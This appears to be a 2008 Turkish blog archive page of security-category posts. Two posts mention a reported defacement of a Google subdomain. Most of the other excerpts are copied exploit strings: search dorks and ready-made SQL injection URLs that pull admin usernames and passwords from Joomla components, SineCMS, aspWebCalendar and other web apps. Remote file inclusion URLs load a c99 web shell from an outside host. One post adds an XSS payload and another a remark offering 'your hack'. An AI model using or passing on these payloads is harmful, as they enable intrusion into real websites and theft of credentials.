Beslemeler:
Yazılar
Yorumlar

‘Guvenlik Konuları Önlem Alın’ Kategorisi için Arşiv

Google Hacklenmesine Dair Zone-h’ın Yazısı

Posted in Guvenlik Konuları Önlem Alın on Aralık 6, 2008 | » yorum bırak;

Googlenin hacklenmesinden sonra zone-h yetkililerinin yazdıgı bir yazı ingilizceydi mustafa adlı bir arkadaş sagolsun türkçeye çevirdi bende sizinle paylaşmak istedim buyrun orjinal yazı burda ingilizce ; http://old.zone-h.org/en/news/read/id=4436/
Türkçeside :
Google ilk Kez Hacklendi !
Google’nin hizmet subdomaini Geçtiğimiz Cumartesi günü Brezilyalı Xfaulz Kod Adlı Hacker Tarafından Hacklendi .
Saldırıya uğrayan site picasa programının resim düzenleme ve yayınlama [...]

Yazının Tamamını Oku »

Google ‘de Hacklenmiş :|

Posted in Guvenlik Konuları Önlem Alın on Aralık 6, 2008 | » yorum bırak;

Aklıma geldi merak ettim google hiç hacklenmişmidir diye zone-h den baktım hacklenmiş şok oldum sizinle paylaşmak istedim zonede spe vermiş ama sub domaini 2004 yıllarında hacklenmiş picasa.google.com adresi
Zone-h : http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,1775926/
Xfaulz Diye Biri hacklemiş Tebrik Etmek Lazım Nasıl Hacklemişse Artık

Yazının Tamamını Oku »

Link Trader (lnkid) Remote sqL

Posted in Guvenlik Konuları Önlem Alın on Ekim 5, 2008 | » yorum bırak;

arama : inurl:ratelink.php?lnkid=
kod : www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0×3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*
admin paneli sitenin sol tarafıdna görünür .]

Yazının Tamamını Oku »

SineCMS <= 2.3.4 Calendar SQL Injection

Posted in Guvenlik Konuları Önlem Alın on Ekim 5, 2008 | » yorum bırak;

Exploit:
http://[target]/[sinecms_path]/mods.php?
mods=Calendar&action=info&id=’+union+select+1,password,3,4,5,6,7,8,9
+from+sine_configuration/*
 
http://[target]/[sinecms_path]/admin/mods_adm.php?
mods=Guestbook&action=modifica&id=’+union+select+1,2,3,4,password,
6+from+sine_configuration/*
http://[target]/[sinecms_path]/admin/mods_adm.php?
mods=Calendar&mese=11′+union+select+1,password,3,4,5,6,7,8,9
+from+sine_configuration/*
http://[target]/[sinecms_path]/admin/mods_adm.php?
mods=Calendar&action=modify&id=’+union+select+1,2,3,4,password,6,7,8,9
+from+sine_configuration/*
http://[target]/[sinecms_path]/admin/mods_adm.php?
mods=Calendar&anno=’+union+select+1,password,3,4,5,6,7,8,9
+from+sine_configuration/*

Yazının Tamamını Oku »

WebCalendar v0.9.45 hack ?

Posted in Guvenlik Konuları Önlem Alın on Ekim 5, 2008 | » yorum bırak;

Bug in : |
| login.php |
| get_reminders.php |
| get_events.php |
EXPLOIT : |
| |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript] |

Yazının Tamamını Oku »

aspWebCalendar SqL

Posted in Guvenlik Konuları Önlem Alın on Ekim 5, 2008 | » yorum bırak;

http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]
Example:
/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config
 
Alıntıdır

Yazının Tamamını Oku »

Joomla Component com_content SqL

Posted in Guvenlik Konuları Önlem Alın on Ekim 5, 2008 | » yorum bırak;

arama: inurl:com_content
http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0×3a,username,password),3,4,5%20from%20jos_users/*

Yazının Tamamını Oku »

pSys v0.7.0 Alpha Multiple Remote File Include

Posted in Guvenlik Konuları Önlem Alın on Ekim 5, 2008 | » yorum bırak;

http://4RxH.CoM/cms1/login.inc.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/adminmenuright.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/fuss.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/kopf.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/forum/ajax_newpost.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_shopkategorie.php?pdir_mod=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_shopkunde.php?pdir_mod=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_user.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/mod/gb/ajax_post.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/csg/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/csg/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/default/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/default/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/simpleblack/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/simpleblack/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
alın size hack işte

Yazının Tamamını Oku »

Joomla Component DT Register Remote SqL injection

Posted in Guvenlik Konuları Önlem Alın on Ekim 5, 2008 | » yorum bırak;

Arama:com_DTRegister eventId
http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0×3a,password) FROM jos_users&task=pay_options&Itemid=138

Yazının Tamamını Oku »

YouTube Blog 0.1 Multiple Remote Vulnerabilities

Posted in Guvenlik Konuları Önlem Alın on Ekim 5, 2008 | » yorum bırak;

SQL]
http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+from+ytb_usuarios+where+id=1/*
_____
[XSS]
http://victim/ytb/mensaje.php?m=<script>alert(/xss/)</script>
_____
[RFI]
http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.110/red.txt

Yazının Tamamını Oku »

Önceki Yazılar»